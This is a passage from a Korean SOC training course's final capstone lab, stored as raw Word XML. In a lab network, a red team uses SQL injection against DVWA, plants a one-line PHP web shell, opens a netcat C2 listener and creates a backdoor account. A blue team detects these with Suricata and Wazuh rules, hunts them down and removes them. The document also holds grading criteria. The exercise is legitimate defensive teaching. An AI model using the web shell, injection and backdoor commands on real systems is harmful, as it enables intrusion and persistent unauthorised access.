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W15] 종합 실전 — APT 캠페인 대응 + SOC 성숙도 재평가(수료)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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>수료 시험</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. 15주간 배운 전 역량을 하나의 사건에 동원한다. 공격자가 APT 다단계 캠페인</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(침투 → 웹쉘 → C2 → 지속성)을 펼치고, 관제팀(너)은 실시간 탐지·IOC 통합관리·위협 헌팅·KPI 측정·**SOC-CMM</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>재평가**(W1 baseline 대비 성장 정량화)까지 종합 수행한다.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SQLi 로 침투해 웹쉘을 심고, C2 채널과 백도어 계정으로 지속성을 확보한다. 관제팀은 ① 공격 탐지</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(Suricata), ② IOC 통합 관리(CDB+Wazuh), ③ 다중 발판 헌팅·제거, ④ KPI 측정과 교차분석, ⑤ SOC-CMM</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>재평가와 수료 보고서로 15주를 매듭짓는다.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APT 공격 후 종합 관제.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 APT 캠페인을, Blue 는 자기 인프라에서 종합 대응.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`sa15r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/var/www/html/.sa15shell.php`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, C2 포트 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>54015</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`soca15`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룰 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9615151</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, Wazuh 룰 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 102151</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, IOC CDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/var/ossec/etc/lists/soc-adv-w15-ioc`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[APT 1·2단계] — 침투 → 웹쉘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APT 캠페인의 초기 단계다. 태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sa15r1-&lt;본인id&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLi 로 침투하고 웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/var/www/html/.sa15shell.php`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 로</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>실행 발판을 확보한다.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VM(192.168.0.202) → 발판 후)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dvwa.el34.lab" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/sqli/?id=sa15r1-kim%27%20UNION%20SELECT%201--+&amp;Submit=Submit"</w:t>
        <w:br/>
        <w:t>cat &gt; /var/www/html/.sa15shell.php &lt;&lt;'PHP'</w:t>
        <w:br/>
        <w:t>&lt;?php /* sa15 */ system($_POST['c'] ?? ''); ?&gt;</w:t>
        <w:br/>
        <w:t>PHP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sa15r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가 남고, 웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.sa15shell.php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sa15r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 탐지가 있거나 웹쉘 파일이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[APT 3·4단계] — C2 + 지속성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APT 후기 단계다. C2 채널 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>포트 54015</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 와 백도어 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`soca15`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 로 지휘통제·지속성을 확보한다.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54015 &gt;/dev/null 2&gt;&amp;1 &amp;    # 또는 nc -lk 54015 / python3 -m http.server 54015</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash soca15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포트 54015 가 listening 이거나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soca15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54015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soca15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[실시간 탐지] — APT 웹공격 Suricata 룰 (sid 9615151)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수료 시뮬레이션의 탐지 단계다. RED-1 의 웹공격을 잡는 Suricata 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9615151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(msg:"SOCADV-W15 capstone SQLi UNION"; flow:to_server; http.uri; content:"UNION"; nocase; content:"SELECT"; nocase; sid:9615151;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9615151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APT 웹공격을 보는 sid 9615151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[IOC 통합 관리] — CDB + Wazuh 동시 운영화 (id 102151)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오늘 대응에서 수집한 IOC(태그/포트/계정)를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CDB 리스트와 Wazuh 룰에 동시 배포</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>해 통합 관리한다. IOC 를</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/var/ossec/etc/lists/soc-adv-w15-ioc`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 에 등록하고, 그 IOC 를 격상하는 Wazuh 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 102151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tee /var/ossec/etc/lists/soc-adv-w15-ioc &gt;/dev/null &lt;&lt;'CDB'</w:t>
        <w:br/>
        <w:t>sa15r1:apt-campaign-tag</w:t>
        <w:br/>
        <w:t>soca15:apt-backdoor-account</w:t>
        <w:br/>
        <w:t>CDB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name="edu,apt,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="102151" level="13"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;sa15&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;SOCADV-W15 - APT campaign IOC escalation&lt;/description&gt;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102151 룰이 있는지로 확인(+ CDB 동시 배포는 보고로 검증).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APT IOC 를 격상하는 id 102151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[통합 헌팅] — 다중 발판 발견 후 제거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APT 는 여러 발판을 남긴다. 웹쉘(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.sa15shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>), C2(포트 54015), 백도어 계정(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>soca15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맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>전수 헌팅해 모두 찾아 제거한다(하나라도 남으면 재침투).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ls -al /var/www/html/.sa15shell.php 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t>sudo ss -tlnp | grep 54015 ; sudo getent passwd | grep soca15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>보고서에 "전수 헌팅 → 발견 목록 → 제거 → 재점검(음성 확인)" 으로 적는다.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웹쉘 또는 C2(포트 54015)가 헌팅되는지로 채점(전수 발견이 핵심).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웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.sa15shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 또는 포트 54015 listening 을 식별한다(전수 제거 보고).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[KPI·교차분석] — MTTD/MTTR + Suricata×Wazuh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운영 성과를 정량화한다. 오늘 시뮬레이션의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>MTTD(탐지 시간)/MTTR(대응 시간)/처리 알림 수/인시던트 수</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>계산하고, Suricata 알림과 Wazuh 호스트 로그를 교차 분석해 APT 캠페인의 전모를 재구성한다.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KPI: MTTD/MTTR/처리 알림 수/인시던트 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교차분석: Suricata(네트워크) × Wazuh(호스트)로 APT 단계 재구성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KPI/교차분석으로 채점.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; 참고: 실재 증거(Suricata IDS rule </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>86601</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 등)를 인용하면 점수가 오른다.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KPI·Suricata×Wazuh 교차분석은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[수료] — SOC-CMM 재평가 + 최종 종합 보고 + Cleanup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15주의 매듭이다. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>W1 의 SOC-CMM baseline 과 비교</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>해 5개 도메인의 성장을 정량화하고, 15주 전체 학습 성과·</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">구축한 탐지 체계·향후 발전 계획을 담은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>최종 종합 보고서</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>를 작성한다. R/B/P 회고 후 실습 아티팩트를</w:t>
      </w:r>
      <w:r>
        <w:br/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하며 수료한다.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SOC-CMM 재평가(W1 점수 vs W15 점수, 도메인별 성장) + 최종 종합 보고서(성과/탐지 체계/발전 계획)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/var/www/html/.sa15shell.php /var/ossec/etc/lists/soc-adv-w15-ioc; sudo pkill -f 'ncat -lk 54015' 2&gt;/dev/null; sudo userdel -r soca15 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t>sudo sed -i '/9615151/d' /etc/suricata/rules/local.rules &amp;&amp; sudo suricatasc -c reload-rules</w:t>
        <w:br/>
        <w:t># local_rules.xml 에서 102151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SOC-CMM 재평가/최종 보고서/회고/cleanup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SOC-CMM 재평가·최종 보고서·회고·cleanup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